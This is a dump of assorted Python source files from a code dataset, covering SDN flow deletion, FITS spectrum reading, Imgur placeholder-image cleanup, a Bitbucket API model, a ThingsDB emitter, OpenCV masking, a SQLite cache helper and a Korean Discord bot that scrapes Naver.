self.get(did)\n if not src or not dst:\n return \n\n sdp_id = dpid_lib.str_to_dpid(src['DataPath'])\n ddp_id = dpid_lib.str_to_dpid(dst['DataPath'])\n\n if self.ryuapp.dps.has_key(sdp_id):\n dp = self.ryuapp.dps[sdp_id]\n ofp, ofp_parser, _, _ = self.ofp_get(dp)\n\n port = self.port_get(dp, id=src['EndpointID'])\n if port:\n match = ofp_parser.OFPMatch(\n in_port=port.port_no,\n eth_type=ether.ETH_TYPE_IP,\n ipv4_src=src['IPAddress'],\n ipv4_dst=dst['IPAddress'])\n\n self.delete_flow(dp, match)\n\n if self.ryuapp.dps.has_key(ddp_id):\n dp = self.ryuapp.dps[sdp_id]\n ofp, ofp_parser, _, _ = self.ofp_get(dp)\n\n port = self.port_get(dp, id=dst['EndpointID'])\n if port:\n match = ofp_parser.OFPMatch(\n in_port=port.port_no,\n eth_type=ether.ETH_TYPE_IP,\n ipv4_src=dst['IPAddress'],\n ipv4_dst=src['IPAddress'])\n\n self.delete_flow(dp, match)\n\n def remove_flow(self, container):\n dp_id = dpid_lib.str_to_dpid(container['DataPath'])\n if dp_id in self.ryuapp.dps:\n dp = self.ryuapp.dps[dp_id]\n ofp, ofp_parser, _, _ = self.ofp_get(dp)\n match = ofp_parser.OFPMatch(\n eth_type=ether.ETH_TYPE_IP,\n ipv4_src=container['IPAddress'])\n self.delete_flow(dp, match)\n\n match = ofp_parser.OFPMatch(\n eth_type=ether.ETH_TYPE_IP,\n ipv4_dst=container['IPAddress'])\n self.delete_flow(dp, match)\n\n match = ofp_parser.OFPMatch(\n eth_type=ether.ETH_TYPE_IP,\n ipv4_src=container['VIPAddress'])\n self.delete_flow(dp, match)\n\n match = ofp_parser.OFPMatch(\n eth_type=ether.ETH_TYPE_IP,\n ipv4_dst=container['VIPAddress'])\n self.delete_flow(dp, match)\n\n","sub_path":"daolicontroller/lib/ipv4.py","file_name":"ipv4.py","file_ext":"py","file_size_in_byte":18468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"202444986","text":"#!/usr/bin/python\nimport sys\nimport re\n\nfor line in sys.stdin.readlines():\n numberList = re.findall('\\d+', line)\n ip = line.split(' ', 1)[0]\n sys.stdout.write('{}, {} \\n'.format(ip, numberList[-1]))\n\nsys.stdout.flush()\n","sub_path":"Assignment4/Py2/fltr_wlog_ip_trbts_toops.py","file_name":"fltr_wlog_ip_trbts_toops.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"328927866","text":"import numpy as np \r\nfrom astropy.io import fits\r\n\r\n\r\ndef lectorFits(rutaEspectrograma):\r\n \"\"\"\r\n lectorFits\r\n ==========\r\n La función lee un archivo de tipo fits. Plotea el HDU, el Header del archivo (para que el usuario compruebe\r\n las filas de datos), el tamaño del array de datos, y saca dos archivos txt con la longitud de onda y la luminosidad y \r\n un dos array, uno de longitud de onda y otro de luminosidad.\r\n\r\n Parameters\r\n ----------\r\n -rutaEspectrograma: string con el nombre de la ruta del archivo fits. Si es un array con más de una fila\r\n de datos, es importante revisar que la función escriba correctamente en la variable el dato que queremos\r\n sacar\r\n\r\n Returns\r\n -------\r\n -Dos archivos txt, uno con la longitud de onda y otro con la luminosidad.\r\n \r\n -Dos arrays, uno con la longitud de onda y otro con la luminosidad.\r\n \"\"\"\r\n archivoFits = fits.open(rutaEspectrograma)\r\n archivoFits.info()\r\n\r\n # Extraemos el Header del FITS\r\n # Selecionamos [0] porque en el ejemplo el PRIMARY del HDU esta en el 0. El primary en los archivos FITS\r\n # es el array que contiene los datos principales.\r\n\r\n head=archivoFits[0].header\r\n print(repr(head))\r\n print(archivoFits[0].data.shape)\r\n\r\n # Extraemos los datos del FITS y asignamos la longitud de onda\r\n dataEspec = np.zeros((2,len(archivoFits[0].data[0,:])))\r\n\r\n # Cada pixel del espectrograma son 0.9 angstroms\r\n wave = []\r\n for i in range(len(dataEspec[0,:])):\r\n wave.append(3500.0+(i*0.9))\r\n\r\n wave = np.array(wave)\r\n wave.round(2)\r\n\r\n dataEspec[0,:] = wave\r\n dataEspec[1,:] = archivoFits[0].data[0,:]\r\n\r\n # Recortamos error de principio y final\r\n data = np.zeros((2,len(dataEspec[0,:])-150))\r\n data[0,:] = dataEspec[0,75:-75]\r\n data[1,:] = dataEspec[1,75:-75]\r\n\r\n # Obtenemos los archivos TXT.\r\n file = np.savetxt(\"wavelength.txt\",data[0,:])\r\n file = np.savetxt(\"flux.txt\",data[1,:])\r\n\r\n archivoFits.close()\r\n\r\n wavelenght = data[0,:]\r\n flux = data[1,:]\r\n\r\n return wavelenght, flux\r\n","sub_path":"lectorFits.py","file_name":"lectorFits.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"411288379","text":"import os\nfrom get_media_files import GetMediaFiles\nimport time\nimport hashlib\nimport click\n\n\ndef are_files_equal(file1, file2):\n \"\"\"given two file objects, checks to see if their bytes are equal\"\"\"\n if bytearray(file1.read()) == bytearray(file2.read()):\n return True\n else:\n return False\n\n\ndef is_imgur_dne_image(img_path):\n \"\"\"takes full image path & checks if bytes are equal to that of imgur\n does not exist image\n \"\"\"\n module_path = os.path.abspath(os.path.dirname(__file__))\n # edit location if needed\n dne_img = os.path.join(module_path, 'imgur-dne.png')\n with open(dne_img, 'rb') as f:\n dne_data = bytearray(f.read())\n with open(img_path, 'rb') as f:\n data = bytearray(f.read())\n if data == dne_data:\n return True\n else:\n return False\n\n\ndef hashfile(afile, hasher, blocksize=65536):\n buf = afile.read(blocksize)\n while len(buf) > 0:\n hasher.update(buf)\n buf = afile.read(blocksize)\n return hasher.hexdigest()\n\n\ndef delete_dne_hash_cmp(path, recursive=False, verbose=False):\n \"\"\"Delete file if its hash matches that of the reference file\"\"\"\n\n media = GetMediaFiles()\n files = media.get_info(path=path, recursive=recursive,\n track_types=['Image'], sort=False)\n\n if verbose:\n print(files)\n print('%s files found' % len(files)) # debug\n print('-------------------------') # debug\n\n init_t = time.time()\n\n # imgur dne image hashlib\n dne_hash = hashfile(open('imgur-dne.png', 'rb'), hashlib.sha256())\n\n # list of hashes\n hashes = list((hashfile(open(fname[0], 'rb'), hashlib.sha256())) for fname in files)\n amount_deleted = 0\n for index in range(len(hashes)):\n if hashes[index] == dne_hash:\n amount_deleted += 1\n os.remove(files[index][0])\n\n print(\"delete_dne_hash_cmp func took %d seconds\\n\" % (int(time.time() - init_t)))\n\n return amount_deleted\n\n\ndef delete_dne(path, recursive=False, verbose=False):\n \"\"\"Delete duplicate file if its byte array matches that of the reference\n \"\"\"\n\n media = GetMediaFiles()\n files = media.get_info(path=path, recursive=recursive,\n track_types=['Image'], sort=False)\n\n init_t = time.time()\n\n if verbose:\n print(files)\n print('%s files found' % len(files)) # debug\n print('-------------------------') # debug\n\n amount_deleted = 0\n # loop over files & check if it's an Imgur DNE image\n for f in files:\n if verbose:\n print(f[0]) # debug\n\n if is_imgur_dne_image(f[0]):\n amount_deleted += 1\n print('%s' % (os.path.split(f[0])[1]))\n os.remove(f[0])\n\n print(\"delete_dne func took %d seconds\\n\" % (int(time.time() - init_t)))\n return amount_deleted\n\n\nif __name__ == \"__main__\":\n @click.command()\n @click.argument('folder')\n @click.option('-r', '--recursive', default=False, is_flag=True)\n def main(folder, recursive):\n init_t = time.time()\n\n folder = os.path.abspath(folder)\n amount_deleted = delete_dne(folder, recursive, verbose=True)\n\n # test_path = 'test-case'\n # delete_dne(test_path, recursive=True)\n\n print('[delete_imgur_dne] %i seconds passed' %\n (time.time() - init_t))\n print('[delete_imgur_dne] %i DNE images found & deleted' %\n amount_deleted)\n\n main()\n","sub_path":"misc_scripts/delete_imgur_dne/delete_dne.py","file_name":"delete_dne.py","file_ext":"py","file_size_in_byte":3500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"488157901","text":"# coding: utf-8\n\n\"\"\"\n Bitbucket API\n\n Code against the Bitbucket API to automate simple tasks, embed Bitbucket data into your own site, build mobile or desktop apps, or even add custom UI add-ons into Bitbucket itself using the Connect framework. # noqa: E501\n\n The version of the OpenAPI document: 2.0\n Contact: support@bitbucket.org\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\n\nclass WebhookSubscription(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n 'active': 'bool',\n 'created_at': 'datetime',\n 'description': 'str',\n 'events': 'list[str]',\n 'subject': 'object',\n 'subject_type': 'str',\n 'url': 'str',\n 'uuid': 'str'\n }\n\n attribute_map = {\n 'active': 'active',\n 'created_at': 'created_at',\n 'description': 'description',\n 'events': 'events',\n 'subject': 'subject',\n 'subject_type': 'subject_type',\n 'url': 'url',\n 'uuid': 'uuid'\n }\n\n def __init__(self, active=None, created_at=None, description=None, events=None, subject=None, subject_type=None, url=None, uuid=None): # noqa: E501\n \"\"\"WebhookSubscription - a model defined in OpenAPI\"\"\" # noqa: E501\n\n self._active = None\n self._created_at = None\n self._description = None\n self._events = None\n self._subject = None\n self._subject_type = None\n self._url = None\n self._uuid = None\n self.discriminator = None\n\n if active is not None:\n self.active = active\n if created_at is not None:\n self.created_at = created_at\n if description is not None:\n self.description = description\n if events is not None:\n self.events = events\n if subject is not None:\n self.subject = subject\n if subject_type is not None:\n self.subject_type = subject_type\n if url is not None:\n self.url = url\n if uuid is not None:\n self.uuid = uuid\n\n @property\n def active(self):\n \"\"\"Gets the active of this WebhookSubscription. # noqa: E501\n\n\n :return: The active of this WebhookSubscription. # noqa: E501\n :rtype: bool\n \"\"\"\n return self._active\n\n @active.setter\n def active(self, active):\n \"\"\"Sets the active of this WebhookSubscription.\n\n\n :param active: The active of this WebhookSubscription. # noqa: E501\n :type: bool\n \"\"\"\n\n self._active = active\n\n @property\n def created_at(self):\n \"\"\"Gets the created_at of this WebhookSubscription. # noqa: E501\n\n\n :return: The created_at of this WebhookSubscription. # noqa: E501\n :rtype: datetime\n \"\"\"\n return self._created_at\n\n @created_at.setter\n def created_at(self, created_at):\n \"\"\"Sets the created_at of this WebhookSubscription.\n\n\n :param created_at: The created_at of this WebhookSubscription. # noqa: E501\n :type: datetime\n \"\"\"\n\n self._created_at = created_at\n\n @property\n def description(self):\n \"\"\"Gets the description of this WebhookSubscription. # noqa: E501\n\n A user-defined description of the webhook. # noqa: E501\n\n :return: The description of this WebhookSubscription. # noqa: E501\n :rtype: str\n \"\"\"\n return self._description\n\n @description.setter\n def description(self, description):\n \"\"\"Sets the description of this WebhookSubscription.\n\n A user-defined description of the webhook. # noqa: E501\n\n :param description: The description of this WebhookSubscription. # noqa: E501\n :type: str\n \"\"\"\n\n self._description = description\n\n @property\n def events(self):\n \"\"\"Gets the events of this WebhookSubscription. # noqa: E501\n\n The events this webhook is subscribed to. # noqa: E501\n\n :return: The events of this WebhookSubscription. # noqa: E501\n :rtype: list[str]\n \"\"\"\n return self._events\n\n @events.setter\n def events(self, events):\n \"\"\"Sets the events of this WebhookSubscription.\n\n The events this webhook is subscribed to. # noqa: E501\n\n :param events: The events of this WebhookSubscription. # noqa: E501\n :type: list[str]\n \"\"\"\n allowed_values = [\"pullrequest:unapproved\", \"issue:comment_created\", \"pullrequest:approved\", \"repo:created\", \"repo:deleted\", \"repo:imported\", \"pullrequest:comment_updated\", \"issue:updated\", \"project:updated\", \"pullrequest:comment_created\", \"repo:commit_status_updated\", \"pullrequest:updated\", \"issue:created\", \"repo:fork\", \"pullrequest:comment_deleted\", \"repo:commit_status_created\", \"repo:updated\", \"pullrequest:rejected\", \"pullrequest:fulfilled\", \"repo:push\", \"pullrequest:created\", \"repo:transfer\", \"repo:commit_comment_created\"] # noqa: E501\n if not set(events).issubset(set(allowed_values)):\n raise ValueError(\n \"Invalid values for `events` [{0}], must be a subset of [{1}]\" # noqa: E501\n .format(\", \".join(map(str, set(events) - set(allowed_values))), # noqa: E501\n \", \".join(map(str, allowed_values)))\n )\n\n self._events = events\n\n @property\n def subject(self):\n \"\"\"Gets the subject of this WebhookSubscription. # noqa: E501\n\n\n :return: The subject of this WebhookSubscription. # noqa: E501\n :rtype: object\n \"\"\"\n return self._subject\n\n @subject.setter\n def subject(self, subject):\n \"\"\"Sets the subject of this WebhookSubscription.\n\n\n :param subject: The subject of this WebhookSubscription. # noqa: E501\n :type: object\n \"\"\"\n\n self._subject = subject\n\n @property\n def subject_type(self):\n \"\"\"Gets the subject_type of this WebhookSubscription. # noqa: E501\n\n The type of entity, which is `repository` in the case of webhook subscriptions on repositories. # noqa: E501\n\n :return: The subject_type of this WebhookSubscription. # noqa: E501\n :rtype: str\n \"\"\"\n return self._subject_type\n\n @subject_type.setter\n def subject_type(self, subject_type):\n \"\"\"Sets the subject_type of this WebhookSubscription.\n\n The type of entity, which is `repository` in the case of webhook subscriptions on repositories. # noqa: E501\n\n :param subject_type: The subject_type of this WebhookSubscription. # noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"user\", \"repository\", \"team\"] # noqa: E501\n if subject_type not in allowed_values:\n raise ValueError(\n \"Invalid value for `subject_type` ({0}), must be one of {1}\" # noqa: E501\n .format(subject_type, allowed_values)\n )\n\n self._subject_type = subject_type\n\n @property\n def url(self):\n \"\"\"Gets the url of this WebhookSubscription. # noqa: E501\n\n The URL events get delivered to. # noqa: E501\n\n :return: The url of this WebhookSubscription. # noqa: E501\n :rtype: str\n \"\"\"\n return self._url\n\n @url.setter\n def url(self, url):\n \"\"\"Sets the url of this WebhookSubscription.\n\n The URL events get delivered to. # noqa: E501\n\n :param url: The url of this WebhookSubscription. # noqa: E501\n :type: str\n \"\"\"\n\n self._url = url\n\n @property\n def uuid(self):\n \"\"\"Gets the uuid of this WebhookSubscription. # noqa: E501\n\n The webhook's id # noqa: E501\n\n :return: The uuid of this WebhookSubscription. # noqa: E501\n :rtype: str\n \"\"\"\n return self._uuid\n\n @uuid.setter\n def uuid(self, uuid):\n \"\"\"Sets the uuid of this WebhookSubscription.\n\n The webhook's id # noqa: E501\n\n :param uuid: The uuid of this WebhookSubscription. # noqa: E501\n :type: str\n \"\"\"\n\n self._uuid = uuid\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, WebhookSubscription):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"bitbucketopenapi/models/webhook_subscription.py","file_name":"webhook_subscription.py","file_ext":"py","file_size_in_byte":9815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"555994480","text":"import math\nclass Solution:\n #Sorting with desc order of height \n # if height is same , arrange in order of k\n def reconstructQueue(self, people):\n people = sorted(people, key = lambda x: (-x[0], x[1]))\n result =[]\n for p in people:\n result.insert(p[1],p)\n return result\n\ns = Solution()\nprint(s.reconstructQueue([[7,0], [4,4], [7,1], [5,0], [6,1], [5,2]]))","sub_path":"LeetcodeProjects/June Leetcode Challenge/06_Queue_Reconstruction_By_Height.py","file_name":"06_Queue_Reconstruction_By_Height.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"358181189","text":"import asyncio\nimport logging\nfrom typing import Union\nfrom ..client import Client\nfrom ..client.abc.events import Events\n\nclass Emitter(Events):\n\n _ev_handlers = dict()\n\n def __init__(\n self,\n client: Client,\n emitter: Union[int, str] = '',\n scope: str = None):\n \"\"\"Initializes an emitter.\n\n Args:\n client (thingsdb.client.Client):\n ThingsDB Client instance.\n emitter (str/int):\n Code which should point to the `thing` to watch for events.\n Defaults to an empty string which is the collection.\n Examples are:\n - ''\n - '.emitter'\n - '#123'\n Or, just the ID of the thing\n scope (str):\n Collection scope. Defaults to the scope of the client.\n \"\"\"\n super().__init__()\n self._event_id = 0\n self._client = client\n\n if isinstance(emitter, int):\n self._thing_id = emitter\n self._code = None\n else:\n self._thing_id = None\n if emitter:\n emitter = '' if emitter == '.' else f'{{{emitter}}}'\n self._code = \\\n f'{emitter}.watch(); {emitter}.id();'\n\n self._scope = scope or client.get_scope()\n\n client.add_event_handler(self)\n asyncio.ensure_future(self._watch())\n\n def __init_subclass__(cls):\n cls._ev_handlers = {}\n\n for key, val in cls.__dict__.items():\n if not key.startswith('__') and \\\n callable(val) and hasattr(val, '_ev'):\n if asyncio.iscoroutinefunction(val):\n val = functools.partial(asyncio.ensure_future, val)\n cls._ev_handlers[val._ev] = val\n\n async def _watch(self):\n if self._thing_id is None:\n self._thing_id = \\\n await self._client.query(self._code, scope=self._scope)\n else:\n await self._client.watch(self._thing_id, scope=self._scope)\n\n def on_reconnect(self):\n asyncio.ensure_future(self._watch())\n\n def on_node_status(self, _status):\n pass\n\n def on_warning(self, warn):\n logging.warning(f'{warn[\"warn_msg\"]} ({warn[\"warn_code\"]})')\n\n def on_watch_init(self, _data):\n pass\n\n def on_event(self, ev, *args):\n cls = self.__class__\n fun = cls._ev_handlers.get(ev)\n if fun is None:\n logging.debug(f'no event handler for `{ev}` on {cls.__name__}')\n return\n fun(self, *args)\n\n def on_watch_update(self, data):\n thing_id = data['#']\n if thing_id != self._thing_id:\n return\n\n event_id, jobs = data['event'], data['jobs']\n\n if self._event_id > event_id:\n logging.warning(\n f'ignore event because the current event `{self._event_id}` '\n f'is greather than the received event `{event_id}`')\n return\n self._event_id = event_id\n\n for job_dict in jobs:\n for name, job in job_dict.items():\n if name == 'event':\n self.on_event(*job)\n\n def on_watch_delete(self, data):\n thing_id = data['#']\n if thing_id == self._thing_id:\n logging.debug(f'emitter with id {thing_id} is removed')\n self._client.remove_event_handler(self)\n\n def on_watch_stop(self, data):\n thing_id = data['#']\n if thing_id == self._thing_id:\n logging.debug(f'emitter with id {thing_id} is stopped')\n self._client.remove_event_handler(self)\n","sub_path":"thingsdb/model/emitter.py","file_name":"emitter.py","file_ext":"py","file_size_in_byte":3659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"172111446","text":"import cv2\nimport numpy as np\n\ndrawing = False # true if mouse is pressed\nmode = True # if True, draw rectangle. Press 'm' to toggle to curve\ncolor = (255, 255, 255)\nthickness = -1\nim = None\n\n# mouse callback function\ndef draw_mask(event,former_x,former_y,flags,param):\n global current_former_x,current_former_y,drawing, mode, color, thickness\n global mask, im, original\n\n if event==cv2.EVENT_LBUTTONDOWN:\n drawing=True\n current_former_x,current_former_y=former_x,former_y\n elif event==cv2.EVENT_MOUSEMOVE:\n if drawing==True:\n if mode==True:\n pt1 = (current_former_x+10,current_former_y+10)\n pt2 = (former_x-10,former_y-10)\n cv2.rectangle(mask, pt1, pt2, color, thickness)\n current_former_x = former_x\n current_former_y = former_y\n elif event==cv2.EVENT_LBUTTONUP:\n drawing=False\n if mode==True:\n pt1 = (current_former_x+10,current_former_y+10)\n pt2 = (former_x-10,former_y-10)\n cv2.rectangle(mask, pt1, pt2, color, thickness)\n current_former_x = former_x\n current_former_y = former_y\n im = cv2.bitwise_not(cv2.bitwise_not(mask) * original)\n # im = original\n return former_x,former_y\n\ndef run_draw(img, output_name=\"mask.png\"):\n global im, mask, original\n im = img\n original = im.copy()\n mask = np.zeros_like(im)\n\n cv2.namedWindow(\"Create a mask\")\n cv2.setMouseCallback('Create a mask', draw_mask)\n while(1):\n cv2.imshow('Create a mask',im)\n k=cv2.waitKey(1)&0xFF\n if k==27:\n break\n cv2.destroyAllWindows()\n\n print(\"Save image\")\n cv2.imwrite(output_name, mask)\n\nif __name__ == \"__main__\":\n img = cv2.imread(\"images/bridge.jpg\")\n run_draw(img)\n","sub_path":"ImagerieNumerique/src/masking.py","file_name":"masking.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"403122582","text":"__author__ = 'Andrew'\n\nimport os\nimport sqlite3\nfrom sql_statements import CREATE_TABLE, INSERT_DATA\n\n\ndef dict_factory(cursor, row):\n \"\"\"\n Factory to turn database queries\n as a dictionary with column names.\n\n \"\"\"\n d = {}\n for idx, col in enumerate(cursor.description):\n d[col[0]] = row[idx]\n return d\n\n\nclass SqliteDB(object):\n\n def __init__(self, db_path='/tmp/sparrow_caching.db'):\n self.db_path = db_path\n self.connection = None\n\n def create_db(self):\n conn = sqlite3.connect(self.db_path)\n c = conn.cursor()\n c.execute(CREATE_TABLE)\n conn.commit()\n conn.close()\n return 'Created SQLite database.'\n\n def destroy_db(self):\n os.remove(self.db_path)\n\n def insert_data(self, workspace, layer, complete_datetime):\n conn = sqlite3.connect(self.db_path)\n c = conn.cursor()\n insert_statement = INSERT_DATA.format(workspace=workspace,\n layer=layer,\n completion_datetime=complete_datetime\n )\n c.execute(insert_statement)\n conn.commit()\n conn.close()\n return insert_statement\n\n def query_db(self, workspace=None):\n self.connection = sqlite3.connect(self.db_path)\n self.connection.row_factory = dict_factory\n c = self.connection.cursor()\n if workspace is not None:\n query_statement = \"SELECT * FROM layer_cache lc WHERE lc.workspace='{workspace}'\".format(workspace=workspace)\n else:\n query_statement = \"SELECT * FROM layer_cache\"\n query_result = c.execute(query_statement)\n return query_result.fetchall()\n\n def close_db(self):\n self.connection.close()","sub_path":"sparrow-tilecache-seed/geoserver/tile_caching/sqlite_db.py","file_name":"sqlite_db.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"328574380","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 23 15:57:41 2019\n\n@author: halid\n\"\"\"\n\n#%%\nnums = [0, 1, 2, 3, 4]\nsquares = []\nfor x in nums:\n squares.append(x ** 2)\nprint(squares) # Prints [0, 1, 4, 9, 16]\n#%%\nnums = [0, 1, 2, 3, 4]\nsquares = [x ** 2 for x in nums]\nprint(squares) # Prints [0, 1, 4, 9, 16]\n#%%\nnums = [0, 1, 2, 3, 4]\neven_squares = [x ** 2 for x in nums if x % 2 == 0]\nprint(even_squares) # Prints \"[0, 4, 16]\"","sub_path":"lists2.py","file_name":"lists2.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"228775521","text":"import discord\r\n\r\nimport asyncio\r\n\r\nimport random\r\n\r\nimport openpyxl\r\n\r\nfrom discord import Member\r\n\r\nfrom discord.ext import commands\r\n\r\n\r\nfrom urllib.request import urlopen, Request\r\n\r\nimport urllib\r\n\r\nimport urllib.request\r\n\r\nimport bs4\r\n\r\n\r\nimport os\r\n\r\nimport sys\r\n\r\nimport json\r\n\r\nimport time\r\n\r\n\r\nclient = discord.Client()\r\n\r\n\r\n@client.event\r\nasync def on_member_join(member):\r\n role = \"\"\r\n for i in member.server.roles:\r\n if i.name == \"USER\":\r\n role = i\r\n break\r\n await client.add_roles(member, role)\r\n\r\n\r\n@client.event\r\nasync def on_ready():\r\n print(\"login\")\r\n\r\n print(client.user.name)\r\n\r\n print(client.user.id)\r\n\r\n print(\"------------------\")\r\n\r\n await client.change_presence(game=discord.Game(name='test', type=1))\r\n\r\n@client.event\r\nasync def on_message(message):\r\n if message.content.startswith('!안녕'):\r\n await client.send_message(message.channel, \"안녕하세요\")\r\n\r\n if message.content.startswith('!이미지'):\r\n\r\n Text = \"\"\r\n learn = message.content.split(\" \")\r\n vrsize = len(learn) # 배열크기\r\n vrsize = int(vrsize)\r\n for i in range(1, vrsize): # 띄어쓰기 한 텍스트들 인식함\r\n Text = Text + \" \" + learn[i]\r\n print(Text.strip()) # 입력한 명령어\r\n\r\n randomNum = random.randrange(0, 40) # 랜덤 이미지 숫자\r\n\r\n location = Text\r\n enc_location = urllib.parse.quote(location) # 한글을 url에 사용하게끔 형식을 바꿔줍니다. 그냥 한글로 쓰면 실행이 안됩니다.\r\n hdr = {'User-Agent': 'Mozilla/5.0'}\r\n # 크롤링 하는데 있어서 가끔씩 안되는 사이트가 있습니다.\r\n # 그 이유는 사이트가 접속하는 상대를 봇으로 인식하였기 때문인데\r\n # 이 코드는 자신이 봇이 아닌것을 증명하여 사이트에 접속이 가능해집니다!\r\n url = 'https://search.naver.com/search.naver?where=image&sm=tab_jum&query=' + enc_location # 이미지 검색링크+검색할 키워드\r\n print(url)\r\n req = Request(url, headers=hdr)\r\n html = urllib.request.urlopen(req)\r\n bsObj = bs4.BeautifulSoup(html, \"html.parser\") # 전체 html 코드를 가져옵니다.\r\n # print(bsObj)\r\n imgfind1 = bsObj.find('div', {'class': 'photo_grid _box'}) # bsjObj에서 div class : photo_grid_box 의 코드를 가져옵니다.\r\n # print(imgfind1)\r\n imgfind2 = imgfind1.findAll('a', {'class': 'thumb _thumb'}) # imgfind1 에서 모든 a태그 코드를 가져옵니다.\r\n imgfind3 = imgfind2[randomNum] # 0이면 1번째사진 1이면 2번째사진 형식으로 하나의 사진 코드만 가져옵니다.\r\n imgfind4 = imgfind3.find('img') # imgfind3 에서 img코드만 가져옵니다.\r\n imgsrc = imgfind4.get('data-source') # imgfind4 에서 data-source(사진링크) 의 값만 가져옵니다.\r\n print(imgsrc)\r\n embed = discord.Embed(\r\n colour=discord.Colour.green()\r\n )\r\n embed.set_image(url=imgsrc) # 이미지의 링크를 지정해 이미지를 설정합니다.\r\n await client.send_message(message.channel, embed=embed) # 메시지를 보냅니다.\r\n\r\n if message.content.startswith('!제비뽑기'):\r\n\r\n channel = message.channel\r\n\r\n embed = discord.Embed(\r\n\r\n title='제비뽑기',\r\n\r\n description='각 번호별로 번호를 지정합니다.',\r\n\r\n colour=discord.Colour.blue()\r\n\r\n )\r\n\r\n embed.set_footer(text='끗')\r\n\r\n Text = \"\"\r\n\r\n learn = message.content.split(\" \")\r\n\r\n vrsize = len(learn) # 배열크기\r\n\r\n vrsize = int(vrsize)\r\n\r\n for i in range(1, vrsize): # 띄어쓰기 한 텍스트들 인식함\r\n\r\n Text = Text + \" \" + learn[i]\r\n\r\n print(Text.strip()) # 입력한 명령어\r\n\r\n number = int(Text)\r\n\r\n List = []\r\n\r\n num = random.randrange(0, number)\r\n\r\n for i in range(number):\r\n\r\n while num in List: # 중복일때만\r\n\r\n num = random.randrange(0, number) # 다시 랜덤수 생성\r\n\r\n List.append(num) # 중복 아닐때만 리스트에 추가\r\n\r\n embed.add_field(name=str(i + 1) + '번째', value=str(num + 1), inline=True)\r\n\r\n print(List)\r\n\r\n await client.send_message(channel, embed=embed)\r\n\r\n if message.content.startswith('!타이머'):\r\n\r\n Text = \"\"\r\n\r\n learn = message.content.split(\" \")\r\n\r\n vrsize = len(learn) # 배열크기\r\n\r\n vrsize = int(vrsize)\r\n\r\n for i in range(1, vrsize): # 띄어쓰기 한 텍스트들 인식함\r\n\r\n Text = Text + \" \" + learn[i]\r\n\r\n secint = int(Text)\r\n\r\n sec = secint\r\n\r\n for i in range(sec, 0, -1):\r\n\r\n print(i)\r\n\r\n await client.send_message(message.channel, embed=discord.Embed(description='타이머 작동중 : ' + str(i) + '초'))\r\n\r\n time.sleep(1)\r\n\r\n\r\n\r\n else:\r\n\r\n print(\"땡\")\r\n\r\n await client.send_message(message.channel, embed=discord.Embed(description='타이머 종료'))\r\n\r\n if message.content.startswith('!실시간검색어') or message.content.startswith('!실검'):\r\n\r\n url = \"https://www.naver.com/\"\r\n\r\n html = urllib.request.urlopen(url)\r\n\r\n bsObj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\n realTimeSerach1 = bsObj.find('div', {'class': 'ah_roll_area PM_CL_realtimeKeyword_rolling'})\r\n\r\n realTimeSerach2 = realTimeSerach1.find('ul', {'class': 'ah_l'})\r\n\r\n realTimeSerach3 = realTimeSerach2.find_all('li')\r\n\r\n embed = discord.Embed(\r\n\r\n title='네이버 실시간 검색어',\r\n\r\n description='실시간검색어',\r\n\r\n colour=discord.Colour.green()\r\n\r\n )\r\n\r\n for i in range(0, 20):\r\n realTimeSerach4 = realTimeSerach3[i]\r\n\r\n realTimeSerach5 = realTimeSerach4.find('span', {'class': 'ah_k'})\r\n\r\n realTimeSerach = realTimeSerach5.text.replace(' ', '')\r\n\r\n realURL = 'https://search.naver.com/search.naver?ie=utf8&query=' + realTimeSerach\r\n\r\n print(realTimeSerach)\r\n\r\n embed.add_field(name=str(i + 1) + '위', value='\\n' + '[%s](<%s>)' % (realTimeSerach, realURL),\r\n inline=False) # [텍스트](<링크>) 형식으로 적으면 텍스트 하이퍼링크 만들어집니다\r\n\r\n await 